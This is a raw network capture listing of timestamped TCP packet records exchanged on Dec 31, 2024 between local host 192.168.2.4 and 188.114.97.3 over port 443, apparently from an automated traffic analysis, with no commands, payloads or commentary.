                                                                                              Dec 31, 2024 08:57:16.792527914 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.792841911 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.792855978 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.792906046 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.792912006 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.793329954 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.793363094 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.793391943 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.793396950 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.793411016 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.793428898 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.824554920 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.824570894 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.824636936 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.824642897 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.824785948 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.825265884 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.825284958 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.825380087 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.825385094 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.825544119 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.826769114 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.826782942 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.826828003 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.826833010 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.826872110 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.826884031 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.850172043 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.850186110 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.850255013 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.850260019 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.850483894 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.879060030 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.879072905 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.879138947 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.879162073 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.879162073 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.879168034 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.879190922 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.879245043 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.879579067 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.879592896 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.879650116 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.879653931 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.880175114 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.880197048 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.880254030 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.880259991 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.880269051 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.910619974 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.910633087 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.910789013 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.910798073 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.911154032 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.911175013 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.911209106 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.911216974 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.911254883 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.912417889 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.912431955 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.912477016 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.912486076 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.912528038 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.936623096 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.936640024 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.936685085 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.936693907 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.936728954 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.965442896 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.965456963 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.965540886 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.965550900 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.965580940 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.965915918 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.965944052 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.965976954 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.965981960 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.966000080 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.966511965 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.966526031 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.966594934 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.966600895 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.966952085 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.966969013 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.967000008 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.967005968 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.967036963 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.997560024 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.997574091 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.997647047 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.997658014 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.997678995 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.998032093 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.998049974 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.998114109 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.998122931 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.998135090 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.999202013 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.999229908 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.999255896 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.999264002 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.999304056 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.023973942 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.023991108 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.024013042 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.024024010 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.024065018 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.052406073 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.052424908 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.052491903 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.052491903 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.052504063 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.052982092 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.053018093 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.053056955 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.053066015 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.053072929 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.053409100 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.053426981 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.053464890 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.053471088 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.053510904 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.053905964 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.053932905 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.053966045 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.053972006 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.053987026 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.084534883 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.084556103 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.084619045 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.084628105 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.084672928 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.084996939 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.085036039 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.085057974 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.085062027 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.085078001 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.086014032 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.086026907 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.086076021 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.086083889 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.086218119 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.111027956 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.111049891 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.111079931 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.111092091 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.111104965 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.139262915 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.139291048 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.139339924 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.139347076 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.139364958 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.139869928 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.139889002 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.139911890 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.139919043 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.139964104 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.140388966 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.140402079 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.140449047 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.140455008 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.140465975 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.140707970 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.140727043 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.140747070 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.140755892 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.140779018 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.171159983 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.171201944 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.171219110 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.171226978 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.171267986 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.171641111 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.171659946 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.171700001 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.171705008 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.171731949 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.172538996 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.172553062 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.172589064 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.172596931 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.172622919 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.197715044 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.197740078 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.197767019 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.197773933 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.197807074 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.226159096 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.226174116 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.226249933 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.226258039 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.226716995 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.226733923 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.226773024 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.226778030 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.226803064 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.227160931 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.227174044 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.227241039 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.227241039 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.227247953 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.227636099 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.227658033 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.227682114 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.227688074 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.227699041 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.258044958 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.258066893 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.258132935 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.258132935 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.258141041 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.258636951 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.258654118 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.258692980 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.258697987 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.258707047 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.259464979 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.259479046 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.259510040 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.259519100 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.259533882 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.284506083 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.284523010 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.284559011 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.284564972 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.284595013 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.312994957 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.313008070 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.313060045 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.313066006 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.313477993 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.313498020 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.313524008 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.313529015 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.313579082 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.314002991 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.314016104 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.314095020 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.314100981 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.314423084 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.314443111 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.314469099 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.314475060 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.314503908 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.344880104 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.344892979 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.344969034 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.344969034 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.344974995 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.345279932 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.345297098 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.345346928 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.345346928 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.345354080 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.346124887 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.346138954 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.346173048 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.346179008 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.346208096 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.371341944 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.371360064 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.371400118 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.371406078 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.371431112 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.399822950 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.399837017 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.399955988 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.399961948 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.400264978 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.400280952 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.400305033 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.400309086 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.400333881 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.400614977 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.400634050 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.400671959 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.400676966 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.400691986 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.401084900 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.401099920 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.401134014 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.401139975 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.401164055 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.431740999 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.431755066 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.431802034 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.431809902 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.431848049 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.432255983 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.432275057 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.432303905 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.432308912 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.432327032 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.432929993 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.432941914 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.432986975 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.432995081 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.458280087 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.458297968 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.458364010 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.458364010 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.458369970 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.486736059 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.486748934 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.486779928 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.486785889 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.486816883 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.487164974 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.487183094 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.487220049 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.487226009 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.487241983 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.487523079 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.487536907 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.487561941 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.487566948 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.487591028 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.487952948 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.487973928 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.487994909 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.487998962 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.488038063 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.518698931 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.518712997 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:17.518757105 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:17.518764973 CET44349735188.114.97.3192.168.2.4
